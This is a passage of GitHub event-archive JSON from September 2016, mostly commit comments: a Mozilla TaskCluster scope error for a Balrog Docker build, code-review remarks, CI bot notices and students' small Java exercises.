\\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\"\\n  ],\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"image\\\": \\\"taskcluster/image_builder:0.1.3\\\",\\n    \\\"features\\\": {\\n      \\\"dind\\\": true,\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && scripts/push-dockerimage.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla/balrog.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"mozbhearsum\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"mozbhearsum@noreply.github.com\\\"\\n    }\\n  },\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Balrog Docker Image Creation\\\",\\n    \\\"description\\\": \\\"Balrog Docker Image Creation\\\",\\n    \\\"owner\\\": \\\"mozbhearsum@noreply.github.com\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla/balrog.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-19T13:49:51.201Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-20T13:49:51.201Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"RXoe9IZvRTmi7y9oxuNWGg\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-20T13:49:51.201Z\\\"\\n}\\n  time:     2016-09-19T13:49:51.407Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#balrog.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla/balrog:branch:master\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:get:repo:github.com/mozilla/balrog:dockerhub\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"ZTwlIMSQR12JG7kyewgf6A\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.irc-channel.#balrog.on-failed\",\n                        \"notify.irc-channel.#balrog.on-exception\"\n                    ],\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla/balrog:dockerhub\"\n                    ],\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"image\": \"taskcluster/image_builder:0.1.3\",\n                        \"features\": {\n                            \"dind\": true,\n                            \"taskclusterProxy\": true\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"git clone $GITHUB_HEAD_REPO_URL && cd balrog && git checkout $GITHUB_HEAD_BRANCH && scripts/push-dockerimage.sh\"\n                        ],\n                        \"env\": {\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_BASE_SHA\": \"c8ec8a917ef6090ed156500df8802dbb4d2ed2f4\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla/balrog.git\",\n                            \"GITHUB_HEAD_USER\": \"mozbhearsum\",\n                            \"GITHUB_HEAD_SHA\": \"7dea9b37e6f7919ab54c32dfa3f119d504d22ba5\",\n                            \"GITHUB_HEAD_BRANCH\": \"master\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"mozbhearsum@noreply.github.com\"\n                        }\n                    },\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Balrog Docker Image Creation\",\n                        \"description\": \"Balrog Docker Image Creation\",\n                        \"owner\": \"mozbhearsum@noreply.github.com\",\n                        \"source\": \"https://github.com/mozilla/balrog.git\"\n                    },\n                    \"created\": \"2016-09-19T13:49:51.201Z\",\n                    \"deadline\": \"2016-09-20T13:49:51.201Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"RXoe9IZvRTmi7y9oxuNWGg\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-20T13:49:51.201Z\"\n                },\n                \"time\": \"2016-09-19T13:49:51.407Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla/balrog:dockerhub\",\n                        \"queue:route:notify.irc-channel.#balrog.on-failed\",\n                        \"queue:route:notify.irc-channel.#balrog.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla/balrog:branch:master\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:get:repo:github.com/mozilla/balrog:dockerhub\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    }\n]\n```"}},"created_at":"2016-09-19T13:49:52Z"}
{"id":"4583405220","type":"CommitCommentEvent","actor":{"login":"dkayiwa"},"repo":{"name":"openmrs/openmrs-contrib-uitestframework"},"payload":{"comment":{"id":19078841,"position":null,"line":null,"path":null,"commit_id":"2680704b7a620387d2bc3a59397aef87dd932131","created_at":"2016-09-19T13:50:47Z","updated_at":"2016-09-19T13:50:47Z","body":"@rkorytkowski hopefully you saw this https://ci.openmrs.org/browse/UITF-UITF-139/log :)"}},"created_at":"2016-09-19T13:50:47Z"}
{"id":"4583406090","type":"CommitCommentEvent","actor":{"login":"alexanderzobnin"},"repo":{"name":"Staples-Inc/mqe-datasource"},"payload":{"comment":{"id":19078848,"position":null,"line":null,"path":null,"commit_id":"f5bd4b39e06c8af771f34af33df27bacd678b83a","created_at":"2016-09-19T13:50:55Z","updated_at":"2016-09-19T13:50:55Z","body":"Can you explain `composeRegex()` function in details? Source data and result."}},"created_at":"2016-09-19T13:50:55Z"}
{"id":"4583410854","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19078871,"position":null,"line":null,"path":null,"commit_id":"af2369ce1518153ac56879233a5987bf2ad0eb77","created_at":"2016-09-19T13:51:47Z","updated_at":"2016-09-19T13:51:47Z","body":"Do you want the variable `d` to be modified?"}},"created_at":"2016-09-19T13:51:47Z"}
{"id":"4583413498","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19078878,"position":null,"line":null,"path":null,"commit_id":"af2369ce1518153ac56879233a5987bf2ad0eb77","created_at":"2016-09-19T13:52:19Z","updated_at":"2016-09-19T13:52:19Z","body":"And don't forget to make sure damage is not negative."}},"created_at":"2016-09-19T13:52:19Z"}
{"id":"4583415980","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19078885,"position":null,"line":null,"path":null,"commit_id":"af2369ce1518153ac56879233a5987bf2ad0eb77","created_at":"2016-09-19T13:52:43Z","updated_at":"2016-09-19T13:52:43Z","body":"Look at it, it can't be negative."}},"created_at":"2016-09-19T13:52:43Z"}
{"id":"4583419792","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19078896,"position":null,"line":null,"path":null,"commit_id":"bd6282cc40e9be3279038090f5cd7a589e2993ea","created_at":"2016-09-19T13:53:24Z","updated_at":"2016-09-19T13:53:24Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#W0FsEJKuTZqfX8YhrhDKVQ"}},"created_at":"2016-09-19T13:53:24Z"}
{"id":"4583420924","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19078897,"position":null,"line":null,"path":null,"commit_id":"af2369ce1518153ac56879233a5987bf2ad0eb77","created_at":"2016-09-19T13:53:35Z","updated_at":"2016-09-19T13:53:35Z","body":"Its dividing, not subtracting. I tested it, it compiles and works. Time to start on magic..."}},"created_at":"2016-09-19T13:53:35Z"}
{"id":"4583421072","type":"CommitCommentEvent","actor":{"login":"ankur0493"},"repo":{"name":"pythonindia/inpycon2016"},"payload":{"comment":{"id":19078898,"position":25,"line":29,"path":"data/schedule.json","commit_id":"5e32eaf892346acb0237a23f20c5c9829d13baf8","created_at":"2016-09-19T13:53:36Z","updated_at":"2016-09-19T13:53:36Z","body":"Shouldn't breakfast/registration timings be extended for every day so that the schedule is continuous? Or just write Registration for the remaining time?"}},"created_at":"2016-09-19T13:53:36Z"}
{"id":"4583421834","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19078902,"position":null,"line":null,"path":null,"commit_id":"af2369ce1518153ac56879233a5987bf2ad0eb77","created_at":"2016-09-19T13:53:44Z","updated_at":"2016-09-19T13:53:44Z","body":"Then fix all the bugs XD."}},"created_at":"2016-09-19T13:53:44Z"}
{"id":"4583423982","type":"CommitCommentEvent","actor":{"login":"fdefalco"},"repo":{"name":"OHDSI/Atlas"},"payload":{"comment":{"id":19078905,"position":null,"line":null,"path":null,"commit_id":"8878600b17f0261be4d585d8a599864f2d987f41","created_at":"2016-09-19T13:54:05Z","updated_at":"2016-09-19T13:54:05Z","body":"I can appreciate how that might be challenging. I'll let you know what I come up with."}},"created_at":"2016-09-19T13:54:05Z"}
{"id":"4583424407","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19078906,"position":null,"line":null,"path":null,"commit_id":"af2369ce1518153ac56879233a5987bf2ad0eb77","created_at":"2016-09-19T13:54:10Z","updated_at":"2016-09-19T13:54:10Z","body":"Do you want those vars to be modified?"}},"created_at":"2016-09-19T13:54:10Z"}
{"id":"4583430847","type":"CommitCommentEvent","actor":{"login":"bengott"},"repo":{"name":"meteor/guide"},"payload":{"comment":{"id":19078926,"position":null,"line":null,"path":null,"commit_id":"4af2e1dfd527694c0f73013d12218b0ba0214591","created_at":"2016-09-19T13:55:19Z","updated_at":"2016-09-19T13:55:19Z","body":":+1: "}},"created_at":"2016-09-19T13:55:19Z"}
{"id":"4583432074","type":"CommitCommentEvent","actor":{"login":"noemimocanu"},"repo":{"name":"noemimocanu/project-GitHub"},"payload":{"comment":{"id":19078930,"position":null,"line":null,"path":null,"commit_id":"a3b32864496625db9dad514667b2bd712df97021","created_at":"2016-09-19T13:55:32Z","updated_at":"2016-09-19T13:55:32Z","body":"GitHub Project \r\ntest project"}},"created_at":"2016-09-19T13:55:32Z"}
{"id":"4583435461","type":"CommitCommentEvent","actor":{"login":"hauleth"},"repo":{"name":"oyvindln/deflate-rs"},"payload":{"comment":{"id":19078937,"position":28,"line":31,"path":"benches/bench.rs","commit_id":"0e81c2c0280f89b0262fe5d7b789412b2f9252e5","created_at":"2016-09-19T13:56:08Z","updated_at":"2016-09-19T13:56:08Z","body":"No need for inner loop. `Bencher` should take care of it."}},"created_at":"2016-09-19T13:56:08Z"}
{"id":"4583435836","type":"CommitCommentEvent","actor":{"login":"hauleth"},"repo":{"name":"oyvindln/deflate-rs"},"payload":{"comment":{"id":19078938,"position":20,"line":23,"path":"benches/bench.rs","commit_id":"0e81c2c0280f89b0262fe5d7b789412b2f9252e5","created_at":"2016-09-19T13:56:12Z","updated_at":"2016-09-19T13:56:12Z","body":"No need for inner loop. `Bencher` should take care of it."}},"created_at":"2016-09-19T13:56:12Z"}
{"id":"4583438860","type":"CommitCommentEvent","actor":{"login":"travismills82"},"repo":{"name":"travismills82/android_kernel_samsung_hero2qltechn"},"payload":{"comment":{"id":19078945,"position":null,"line":null,"path":null,"commit_id":"cd25e6646d40b1ffe3c3e3517019c1dd020e8d18","created_at":"2016-09-19T13:56:43Z","updated_at":"2016-09-19T13:56:43Z","body":"Ok I will amend it. "}},"created_at":"2016-09-19T13:56:43Z"}
{"id":"4583442312","type":"CommitCommentEvent","actor":{"login":"ALucking1"},"repo":{"name":"ALucking1/student-directory"},"payload":{"comment":{"id":19078952,"position":null,"line":null,"path":null,"commit_id":"05fd5be79bff881ac7575a78b77f13aff1f0e3d1","created_at":"2016-09-19T13:57:20Z","updated_at":"2016-09-19T13:57:20Z","body":"14.6"}},"created_at":"2016-09-19T13:57:20Z"}
{"id":"4583442999","type":"CommitCommentEvent","actor":{"login":"hudokkow"},"repo":{"name":"AchimTuran/xbmc"},"payload":{"comment":{"id":19078956,"position":4,"line":44,"path":"project/cmake/scripts/common/AddonHelpers.cmake","commit_id":"8295db89387dcd643994798e7815b576215ceeee","created_at":"2016-09-19T13:57:27Z","updated_at":"2016-09-19T13:57:27Z","body":"Still travelling. If I forget about this ping me again in a couple of days.\r\n"}},"created_at":"2016-09-19T13:57:27Z"}
{"id":"4583443480","type":"CommitCommentEvent","actor":{"login":"ALucking1"},"repo":{"name":"ALucking1/student-directory"},"payload":{"comment":{"id":19078957,"position":null,"line":null,"path":null,"commit_id":"7d5ad7335f199f664723bc62b6ffc6bab6f2f561","created_at":"2016-09-19T13:57:32Z","updated_at":"2016-09-19T13:57:32Z","body":"14.4"}},"created_at":"2016-09-19T13:57:32Z"}
{"id":"4583443780","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19078960,"position":null,"line":null,"path":null,"commit_id":"b724e2cd0087adca18edf2746078fd13a4f97f1e","created_at":"2016-09-19T13:57:35Z","updated_at":"2016-09-19T13:57:35Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b724e2cd0087adca18edf2746078fd13a4f97f1e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T13:57:35Z"}
{"id":"4583444255","type":"CommitCommentEvent","actor":{"login":"ALucking1"},"repo":{"name":"ALucking1/student-directory"},"payload":{"comment":{"id":19078963,"position":null,"line":null,"path":null,"commit_id":"a0c4c1f4a2518527999ce9dadd679f56223cbdc2","created_at":"2016-09-19T13:57:41Z","updated_at":"2016-09-19T13:57:41Z","body":"14.3"}},"created_at":"2016-09-19T13:57:41Z"}
{"id":"4583445538","type":"CommitCommentEvent","actor":{"login":"ALucking1"},"repo":{"name":"ALucking1/student-directory"},"payload":{"comment":{"id":19078966,"position":null,"line":null,"path":null,"commit_id":"5dc82e742b0a6d5035a87108c8ae5852fddf8b56","created_at":"2016-09-19T13:57:52Z","updated_at":"2016-09-19T13:57:52Z","body":"14.2"}},"created_at":"2016-09-19T13:57:52Z"}
{"id":"4583448438","type":"CommitCommentEvent","actor":{"login":"itbut"},"repo":{"name":"itbut/java"},"payload":{"comment":{"id":19078972,"position":5,"line":5,"path":"A.java","commit_id":"65b7695075873e1a3c3be6ad63e2bad99e9a448c","created_at":"2016-09-19T13:58:21Z","updated_at":"2016-09-19T13:58:21Z","body":"package Basic;\r\n\r\npublic class A {\r\n    \r\n    private A a; // зеленым отмечены именап атрибутов класса\r\n    \r\n    public static void main(String[] args){\r\n     System.out.println(\"A:main()\");\r\n     A a = new A();\r\n     a.a(); // вызов метода\r\n     a.a = a; //атрибут\r\n    }\r\n    void a(){\r\n     System.out.println(\"A:a()\");\r\n    }\r\n}\r\n\r\n"}},"created_at":"2016-09-19T13:58:21Z"}
{"id":"4583452081","type":"CommitCommentEvent","actor":{"login":"sletuffe"},"repo":{"name":"drolbr/Overpass-API"},"payload":{"comment":{"id":19078977,"position":null,"line":null,"path":null,"commit_id":"2625d7a7fecac93eaa5781e00edb758231a09697","created_at":"2016-09-19T13:58:54Z","updated_at":"2016-09-19T13:58:54Z","body":"Just randomly browsing commits, comes into this one (raised a manual merge in my instance), http://localhost/api isn't necessarily a working local url either. Better still than remotely interrogating http://overpass-api.de/api of course, but In case that might be interesting, here is how I solved this : \r\nhttps://github.com/osm-fr/Overpass-API/blob/master/src/cgi-bin/ping\r\n(querying the local $EXEC_DIR/interpreter without requiring wget as dependency)"}},"created_at":"2016-09-19T13:58:54Z"}
{"id":"4583453508","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"ValentinaSbLn/ThirdLab"},"payload":{"comment":{"id":19078981,"position":1,"line":35,"path":"src/collections/SecondTask.java","commit_id":"7cf5ec7a6e6b13e03fed400199fe64c53869a28f","created_at":"2016-09-19T13:59:11Z","updated_at":"2016-09-19T13:59:11Z","body":"Лишнее вычитание в компараторе.\r\nКомпаратор лучше вынести из конструктора в отдельное место (лучше всего сделать его статическим приватным классом).\r\nМожно для сравнения int'ов использовать Integer.compare\r\nМожно сделать цепочку компараторов - один компаратор по длине, другой по тексту. Потом связать их друг с другом (в 8-й java добавили Comparator.thenComparing)"}},"created_at":"2016-09-19T13:59:11Z"}
{"id":"4583454940","type":"CommitCommentEvent","actor":{"login":"rkorytkowski"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":19078983,"position":null,"line":null,"path":null,"commit_id":"e6fc3869109c616db5030b6fd9e277a2e39ef3b5","created_at":"2016-09-19T13:59:26Z","updated_at":"2016-09-19T13:59:26Z","body":"I see! Thanks @dkayiwa! Could you please see if my follow up commit at https://github.com/openmrs/openmrs-core/commit/d663ec3a6010281ab5ffcba98a56d4a691d7749e fixes the issue for you? Or how to reproduce it in tests?"}},"created_at":"2016-09-19T13:59:26Z"}
{"id":"4583456376","type":"CommitCommentEvent","actor":{"login":"MKRISH547"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19078987,"position":null,"line":null,"path":null,"commit_id":"9f6ecedecc7d9601c72a3019b4b69b02ed0fb269","created_at":"2016-09-19T13:59:40Z","updated_at":"2016-09-19T13:59:40Z","body":"import java.io.*;\r\nimport java.lang.*;\r\nimport java.util.*;\r\nclass Sumd\r\n{\r\n  public static void main(String[] args)\r\n  { \r\n    String str=\"ab1cd2g45\";\r\n    int sum=0;\r\n    char ch;\r\n    int i;\r\n     \r\n    for(i=0;i<=7;i++)\r\n    {\r\n\t\tch=str.charAt(i);\r\n     if(Character.isDigit(ch))\r\n     { \r\n\t   int a = Integer.parseInt(str.substring(i,i+1)); \t  \r\n         \r\n               sum=sum+a;\r\n      //System.out.println(str.substring(i,i+1));\r\n      }\r\n      \r\n      } \r\n      System.out.println(sum);\r\n  }\r\n  }    \r\n"}},"created_at":"2016-09-19T13:59:40Z"}
{"id":"4583456503","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":19078988,"position":null,"line":null,"path":null,"commit_id":"af2369ce1518153ac56879233a5987bf2ad0eb77","created_at":"2016-09-19T13:59:41Z","updated_at":"2016-09-19T13:59:41Z","body":"It does modify."}},"created_at":"2016-09-19T13:59:41Z"}
{"id":"4583457049","type":"CommitCommentEvent","actor":{"login":"MKRISH547"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19078991,"position":null,"line":null,"path":null,"commit_id":"9f6ecedecc7d9601c72a3019b4b69b02ed0fb269","created_at":"2016-09-19T13:59:46Z","updated_at":"2016-09-19T13:59:46Z","body":"import java.io.*;\r\nclass Triple\r\n{\r\n public static void main(String[] args)throws IOException\r\n {\r\n String str=\"abcXXXabc\";\r\n int len=str.length();\r\n int temp=1,a=0,j,count=0;\r\n char ch;\r\n for(int i=0;i<(len-1);i++)\r\n { j=i;a=1;\r\n\t\twhile(str.charAt(j)==str.charAt(j+1))\r\n\t\t{\r\n\t       a=a+1;\r\n\t       j++;\r\n\t       if(j==len-1)\r\n\t          break;\r\n       }\r\n  \r\n\t  if(a>=3)\r\n\t  {\r\n\t     count++;\r\n\t  }\r\n }\r\n System.out.println(count);\r\n}\r\n}\r\n\r\n"}},"created_at":"2016-09-19T13:59:46Z"}
{"id":"4583457464","type":"CommitCommentEvent","actor":{"login":"bryaneaton13"},"repo":{"name":"bryaneaton13/react-pull-to-refresh"},"payload":{"comment":{"id":19078995,"position":null,"line":null,"path":null,"commit_id":"e14762e29f2ea51280f47b2bffc8dd46c75fda0e","created_at":"2016-09-19T13:59:51Z","updated_at":"2016-09-19T13:59:51Z","body":"I'm not sure I understand. Please check out the demo to see if that answers your question."}},"created_at":"2016-09-19T13:59:51Z"}
{"id":"4583457560","type":"CommitCommentEvent","actor":{"login":"MKRISH547"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19078996,"position":null,"line":null,"path":null,"commit_id":"9f6ecedecc7d9601c72a3019b4b69b02ed0fb269","created_at":"2016-09-19T13:59:51Z","updated_at":"2016-09-19T13:59:51Z","body":"import java.io.*;\r\nclass Solution1\r\n{\r\n public static void main(String[] args)throws IOException\r\n {\r\n String str=\"jaaaavaa\";\r\n int len=str.length();\r\n int temp=1,a=0,j;\r\n char ch;\r\n for(int i=0;i<(len-1);i++)\r\n { j=i;a=1;\r\n\t\twhile(str.charAt(j)==str.charAt(j+1))\r\n\t\t{\r\n\t       a=a+1;\r\n\t       j++;\r\n\t       if(j==len-1)\r\n\t          break;\r\n       }\r\n  \r\n\t  if(temp<=a)\r\n\t  temp=a;\r\n\t   \r\n }\r\n System.out.println(temp);\r\n}\r\n}\r\n"}},"created_at":"2016-09-19T13:59:51Z"}
{"id":"4583458621","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19078999,"position":null,"line":null,"path":null,"commit_id":"30579321f8289a0985d74ff7613bdd3051865354","created_at":"2016-09-19T14:00:02Z","updated_at":"2016-09-19T14:00:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1047](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13557&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-19T14:00:02Z"}
{"id":"4583459428","type":"CommitCommentEvent","actor":{"login":"MKRISH547"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19079002,"position":null,"line":null,"path":null,"commit_id":"9f6ecedecc7d9601c72a3019b4b69b02ed0fb269","created_at":"2016-09-19T14:00:14Z","updated_at":"2016-09-19T14:00:14Z","body":"those are the exercises for today\r\n"}},"created_at":"2016-09-19T14:00:14Z"}
{"id":"4583462077","type":"CommitCommentEvent","actor":{"login":"hyungtaecf"},"repo":{"name":"simvery/BlueHouseProject"},"payload":{"comment":{"id":19079013,"position":null,"line":null,"path":null,"commit_id":"4d46ceb936697b3aa4dde323d6de8fc7348436f1","created_at":"2016-09-19T14:00:42Z","updated_at":"2016-09-19T14:00:42Z","body":"확인했습니다."}},"created_at":"2016-09-19T14:00:42Z"}
{"id":"4583462621","type":"CommitCommentEvent","actor":{"login":"bfontaine"},"repo":{"name":"venantius/ultra"},"payload":{"comment":{"id":19079017,"position":5,"line":18,"path":"README.md","commit_id":"4c7d77cf4018794a51e31692a450fa4d98452bf1","created_at":"2016-09-19T14:00:47Z","updated_at":"2016-09-19T14:00:47Z","body":"You should commit this *after* the 0.5.0 release because right now it gives an error if one tries to add that to `~/.lein/profiles.clj`. :neutral_face: "}},"created_at":"2016-09-19T14:00:47Z"}
{"id":"4583464003","type":"CommitCommentEvent","actor":{"login":"deidarayu"},"repo":{"name":"deidarayu/poc"},"payload":{"comment":{"id":19079022,"position":null,"line":null,"path":null,"commit_id":"0828ee408233fc461732014b4717c20545c5284f","created_at":"2016-09-19T14:01:00Z","updated_at":"2016-09-19T14:01:00Z","body":"bookingecms_6_sql"}},"created_at":"2016-09-19T14:01:00Z"}
{"id":"4583465732","type":"CommitCommentEvent","actor":{"login":"t-kusakabe"},"repo":{"name":"takuya032/protospace"},"payload":{"comment":{"id":19079023,"position":29,"line":20,"path":"app/assets/stylesheets/images.css.scss","commit_id":"c9c19c6a858d05b75d1151db06b54b2ac16d0fe9","created_at":"2016-09-19T14:01:20Z","updated_at":"2016-09-19T14:01:20Z","body":"PR出したタイミングで自分で一回見てみるとこういうミスはなくなると思います&エディタの設定で保存したときに自動で改行入れてくれるようになると言った思うんですけど(他のコミットでも言ってる...)"}},"created_at":"2016-09-19T14:01:20Z"}
{"id":"4583467534","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19079027,"position":null,"line":null,"path":null,"commit_id":"95464fe9e9f3d902ad02f316e419d5c2dbaaa2a0","created_at":"2016-09-19T14:01:39Z","updated_at":"2016-09-19T14:01:39Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#fKqkwZ4SQ0-dtUrYHUJmbw"}},"created_at":"2016-09-19T14:01:39Z"}
{"id":"4583468557","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19079028,"position":null,"line":null,"path":null,"commit_id":"67be4508bfe2a4c31b81ed5d9f0087539be6f262","created_at":"2016-09-19T14:01:48Z","updated_at":"2016-09-19T14:01:48Z","body":"[Code coverage](https://118-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**"}},"created_at":"2016-09-19T14:01:48Z"}
{"id":"4583470449","type":"CommitCommentEvent","actor":{"login":"hyungtaecf"},"repo":{"name":"simvery/BlueHouseProject"},"payload":{"comment":{"id":19079035,"position":null,"line":null,"path":null,"commit_id":"8233f33b992d3b6d4b999f6a592176a82bd59044","created_at":"2016-09-19T14:02:10Z","updated_at":"2016-09-19T14:02:10Z","body":"그럼 코드를 바꿔야 되겠죠?"}},"created_at":"2016-09-19T14:02:10Z"}
{"id":"4583471741","type":"CommitCommentEvent","actor":{"login":"Kotolegokot"},"repo":{"name":"Kotolegokot/IrrlichtTest4"},"payload":{"comment":{"id":19079038,"position":5,"line":27,"path":"src/Game.cpp","commit_id":"9ec0e4c68694d632875da5607050a7cb30bfd407","created_at":"2016-09-19T14:02:24Z","updated_at":"2016-09-19T14:02:24Z","body":"хуйня. верни обратно"}},"created_at":"2016-09-19T14:02:24Z"}
{"id":"4583472214","type":"CommitCommentEvent","actor":{"login":"yuya-oc"},"repo":{"name":"Razzeee/desktop"},"payload":{"comment":{"id":19079041,"position":23,"line":34,"path":"src/main.js","commit_id":"1092aa3f547efc85f882e7e1c79033b2dcc71662","created_at":"2016-09-19T14:02:29Z","updated_at":"2016-09-19T14:02:29Z","body":"Sorry, last my comment was wrong. `disable` is necessary, so following code would fix.\r\n\r\n```javascript\r\nif (enabled) {\r\n  return appLauncher.disable().then(function() {\r\n    return appLauncher.enable();\r\n  });\r\n}\r\n```"}},"created_at":"2016-09-19T14:02:29Z"}
{"id":"4583472331","type":"CommitCommentEvent","actor":{"login":"AchimTuran"},"repo":{"name":"AchimTuran/xbmc"},"payload":{"comment":{"id":19079042,"position":4,"line":44,"path":"project/cmake/scripts/common/AddonHelpers.cmake","commit_id":"8295db89387dcd643994798e7815b576215ceeee","created_at":"2016-09-19T14:02:30Z","updated_at":"2016-09-19T14:02:30Z","body":"Thx for your quicl response, no hurry. Just wanted to start with this and change the buildsystem for binary addons to something that suits my needs."}},"created_at":"2016-09-19T14:02:30Z"}
{"id":"4583474749","type":"CommitCommentEvent","actor":{"login":"10alswhd"},"repo":{"name":"10alswhd/BlueHouseProject"},"payload":{"comment":{"id":19079049,"position":null,"line":null,"path":null,"commit_id":"4d46ceb936697b3aa4dde323d6de8fc7348436f1","created_at":"2016-09-19T14:02:54Z","updated_at":"2016-09-19T14:02:54Z","body":"입력값 n부터 m까지의 합을 구하는 프로그램 입니다."}},"created_at":"2016-09-19T14:02:54Z"}
